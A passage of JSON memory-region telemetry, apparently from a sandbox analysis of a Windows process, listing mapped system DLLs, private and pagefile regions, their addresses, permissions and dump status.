"version": 1 }, "end_va": 1959366655, "entry_point": 1959335334, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_4908", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1959329792, "timestamp": "00:01:37.072", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1959395328, "type": "region", "version": 1 }, "end_va": 1959464959, "entry_point": 1959400192, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_4909", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959395328, "timestamp": "00:01:37.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1959526400, "type": "region", "version": 1 }, "end_va": 1959579647, "entry_point": 1959530976, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_4910", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959526400, "timestamp": "00:01:37.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_4911", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:37.074", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4912", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:37.074", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4913", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:37.075", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4914", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:37.075", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4915", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:37.076", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4916", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:37.076", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4917", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:37.077", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4918", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:37.077", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4919", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:37.077", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4920", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:37.078", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_4921", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:37.078", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4922", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:37.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4923", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:37.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4924", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:37.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_4925", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:37.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4926", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:37.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4927", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:37.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4928", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:37.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4929", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:37.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4930", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:37.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 8421375, "entry_point": 0, "filename": null, "id": "region_4931", "name": "pagefile_0x0000000000680000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6815744, "timestamp": "00:01:37.126", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4932", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:37.126", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4933", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:37.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_4934", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:37.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1187839, "entry_point": 0, "filename": null, "id": "region_4935", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:37.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 1245184, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_4936", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 1245184, "timestamp": "00:01:37.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_4937", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:37.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_4938", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:37.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_4939", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:37.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 0, "filename": null, "id": "region_4940", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:01:37.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 3145728, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_4941", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 3145728, "timestamp": "00:01:37.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6356991, "entry_point": 0, "filename": null, "id": "region_4942", "name": "private_0x00000000005d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6094848, "timestamp": "00:01:37.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8454144, "type": "region", "version": 1 }, "end_va": 10031103, "entry_point": 0, "filename": null, "id": "region_4943", "name": "pagefile_0x0000000000810000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8454144, "timestamp": "00:01:37.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10092544, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_4944", "name": "pagefile_0x00000000009a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10092544, "timestamp": "00:01:37.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33030144, "type": "region", "version": 1 }, "end_va": 33292287, "entry_point": 0, "filename": null, "id": "region_4945", "name": "private_0x0000000001f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 33030144, "timestamp": "00:01:37.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_4946", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:37.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4947", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:37.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_4948", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:37.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958526975, "entry_point": 1958292296, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_4949", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:01:37.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1959002112, "type": "region", "version": 1 }, "end_va": 1959043071, "entry_point": 1959007386, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_4950", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1959002112, "timestamp": "00:01:37.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_4951", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:01:37.243", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 32112639, "entry_point": 0, "filename": null, "id": "region_4952", "name": "private_0x0000000001da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31064064, "timestamp": "00:01:37.243", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1958739968, "type": "region", "version": 1 }, "end_va": 1958907903, "entry_point": 1958767385, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_4953", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1958739968, "timestamp": "00:01:37.243", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33292288, "type": "region", "version": 1 }, "end_va": 36237311, "entry_point": 33292288, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4954", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33292288, "timestamp": "00:01:37.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36306944, "type": "region", "version": 1 }, "end_va": 36569087, "entry_point": 0, "filename": null, "id": "region_4955", "name": "private_0x00000000022a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36306944, "timestamp": "00:01:37.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37027840, "type": "region", "version": 1 }, "end_va": 37289983, "entry_point": 0, "filename": null, "id": "region_4956", "name": "private_0x0000000002350000", "norm_filename": null, "region_type": "private_memory", "start_va": 37027840, "timestamp": "00:01:37.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4957", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:37.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4958", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:37.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4959", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:37.257", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_4960", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:37.259", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_4961", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:01:37.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 5505023, "entry_point": 0, "filename": null, "id": "region_4962", "name": "private_0x0000000000500000", "norm_filename": null, "region_type": "private_memory", "start_va": 5242880, "timestamp": "00:01:37.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36634624, "type": "region", "version": 1 }, "end_va": 36896767, "entry_point": 0, "filename": null, "id": "region_4963", "name": "private_0x00000000022f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36634624, "timestamp": "00:01:37.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37814272, "type": "region", "version": 1 }, "end_va": 38076415, "entry_point": 0, "filename": null, "id": "region_4964", "name": "private_0x0000000002410000", "norm_filename": null, "region_type": "private_memory", "start_va": 37814272, "timestamp": "00:01:37.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958674432, "type": "region", "version": 1 }, "end_va": 1958735871, "entry_point": 1958683040, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_4965", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1958674432, "timestamp": "00:01:37.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4966", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:37.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4967", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:37.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1787297792, "type": "region", "version": 1 